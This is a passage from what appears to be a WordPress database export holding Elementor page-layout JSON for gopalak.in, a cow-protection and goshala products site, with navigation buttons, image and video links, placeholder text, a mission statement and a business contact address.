here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9923,1664,'_elementor_page_assets','a:0:{}'),(9926,1665,'_elementor_edit_mode','builder'),(9927,1665,'_elementor_template_type','wp-page'),(9928,1665,'_elementor_version','3.7.8'),(9929,1665,'_wp_page_template','elementor_canvas'),(9930,1665,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"9\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 